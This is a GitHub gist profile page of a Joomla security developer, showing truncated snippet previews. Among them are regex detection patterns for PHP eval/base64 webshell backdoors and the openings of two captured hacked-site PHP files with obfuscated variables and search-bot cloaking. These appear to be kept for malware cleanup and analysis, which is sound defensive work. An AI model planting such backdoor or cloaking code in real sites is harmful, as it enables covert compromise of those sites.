Skip to content

Instantly share code, notes, and snippets.

🎯
Focusing

Phil Taylor PhilETaylor

🎯
Focusing
View GitHub Profile
View content
if (!is_string(@$json->version)) {
$json->version = '';
}
View removebtn
<script>
jQuery(document).ready(function(){
jQuery('#submitBtn').click(function(e){
jQuery(this).remove();
});
});
</script>
@PhilETaylor
PhilETaylor / match.regex
Last active Aug 29, 2015
Regexes For Perfect Removal
View match.regex
<\?php\s*eval\(base64_decode\(\$_POST\['[a-zA-Z0-9]{7}'\]\)\)\;\?>|<\?php\s*\$sF="PCT4BA6ODSE_";\$s21=strtolower\(\$sF\[4\]\.\$sF\[5\]\.\$sF\[9\]\.\$sF\[10\]\.\$sF\[6\]\.\$sF\[3\]\.\$sF\[11\]\.\$sF\[8\]\.\$sF\[10\]\.\$sF\[1\]\.\$sF\[7\]\.\$sF\[8\]\.\$sF\[10\]\);\$s20=strtoupper\(\$sF\[11\]\.\$sF\[0\]\.\$sF\[7\]\.\$sF\[9\]\.\$sF\[2\]\);if\s\(isset\(\$\{\$s20\}\['[a-zA-Z0-9]{7}'\]\)\)\s\{eval\(\$s21\(\$\{\$s20\}\['[a-zA-Z0-9]{7}'\]\)\);\}\?>|<\?php\s*\$qV=\"stop_\";\$s20=strtoupper\(\$qV\[4\].\$qV\[3\].\$qV\[2\].\$qV\[0\].\$qV\[1\]\);if\(isset\(\$\{\$s20\}\['[a-zA-Z0-9]{7}'\]\)\)\{eval\(\$\{\$s20\}\['[a-zA-Z0-9]{7}'\]\);\}\?>
<\?php\s+\$.{4,6}\s=\s\".{4,32}\";\sif\(isset\(\$_REQUEST\[\'.{4,10}\'\]\)\)\s{\s\$.{4,10}\s=\s\$\_REQUEST\[\'.{4,10}\'\];\seval\(\$.{4,10}\);\sexit\(\);\s\}\s+if\(isset\(\$_REQUEST\[\'.{4,10}\'\]\)\)\s\{\s\$.{4,10}\s=\s\$_REQUEST\[\'.{4,10}\'\];\s\$.{4,10}\s=\s\$_REQUEST\[\'.{4,10}\'\];\s\$.{4,10}\s=\sfopen\(\$.{4,10},\s\'w\'\);\s\$.{4,10}\s=\sfwrite\(\$.{4,10},\s\$.{4,10}\);\sfclose\(\
@PhilETaylor
PhilETaylor / time.php
Created Feb 28, 2015
Check Server Time
View time.php
<?php
/**
* @package Blue Flame Network (bfNetwork)
* @copyright Copyright (C) 2011, 2012, 2013, 2014, 2015 Blue Flame IT Ltd. All rights reserved.
* @license GNU General Public License version 3 or later
* @link http://myJoomla.com/
* @author Phil Taylor / Blue Flame IT Ltd.
*
* bfNetwork is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
View test.php
<?php
define('_JEXEC', 1);
define('JPATH_BASE', __DIR__);
require_once JPATH_BASE . '/includes/defines.php';
error_reporting(E_ALL);
ini_set('display_errors', 1);
require_once JPATH_BASE . '/includes/framework.php';
@PhilETaylor
PhilETaylor / 6556.php
Last active Aug 29, 2015
Test case for issue 6556
View 6556.php
<?php
// place this file in root of Joomla 3.4.1 Site
// Bootstrap
define('_JEXEC', 1);
define('JPATH_BASE', __DIR__);
require_once JPATH_BASE . '/includes/defines.php';
require_once JPATH_BASE . '/includes/framework.php';
$app = JFactory::getApplication('site');
View hack.php
<?
${"GLOBALS"}["rccbcjbve"] = "credit";
${"GLOBALS"}["ecgmatfzch"] = "ctx";
${"GLOBALS"}["gbmjnqnelon"] = "b_t";
if (!defined("CREDIT")) {
${"GLOBALS"}["iqygiudjlzx"] = "b_t";
strstr(strtolower($_SERVER["HTTP_USER_AGENT"]), "googlebot") ? ${${"GLOBALS"}["gbmjnqnelon"]} = "1" : ${${"GLOBALS"}["gbmjnqnelon"]} = "0";
strstr(strtolower($_SERVER["HTTP_USER_AGENT"]), "bingbot") ? ${${"GLOBALS"}["gbmjnqnelon"]} = "2" : ${${"GLOBALS"}["iqygiudjlzx"]} = ${${"GLOBALS"}["gbmjnqnelon"]};
${${"GLOBALS"}["ecgmatfzch"]} = stream_context_create(array("http" => array("timeout" => 3)));
try {
@PhilETaylor
PhilETaylor / rvqqwmas.php
Created May 5, 2015
hacked example May 2015
View rvqqwmas.php
<?php
$burk = 'it]]$e_$r'; $fiance ='tykei6';$incoherent = 'ah[';$descry='c';$fucku = 'W$])ONWdT'; $betta= 'Iw';$drip='HT(na';$expendable= ')'; $darda= 'e';$capturers='d';$lettered='g'; $clarabelle='e';$bait = 'rto"ecvm';
$alverta ='o';
$lolly ='da`ic?g_';
$biscuit= '?'; $bondsman= 'O(=SL';$breastworks= 'RTsb,_lf';$hocus= 'U(["Q';
$interruption= 'Er'; $boxers='""ET['; $evaleen='T';
View gist:d6314c46dd44fabd5479
Return-Path: <agent@ukrs394972.pur3.net>
Delivered-To: phil@phil-taylor.com
Received: from smtp39.gate.ord1a (smtp39.gate.ord1a.rsapps.net [10.130.4.39])
by store127a.mail.ord1a (SMTP Server) with ESMTP id 42DB280001
for <phil@phil-taylor.com>; Fri, 22 May 2015 07:28:07 -0400 (EDT)
Received: from [172.20.100.8] ([172.20.100.8:41554] helo=smtp8.gate.dfw1a)
by smtp39.gate.ord1a.rsapps.net (envelope-from <agent@ukrs394972.pur3.net>)
(ecelerity 2.2.3.49 r(42060/42061)) with ESMTPS (cipher=AES256-SHA)
id A3/A8-14118-7C21F555; Fri, 22 May 2015 07:28:07 -0400
X-Spam-Threshold: 95
You can’t perform that action at this time.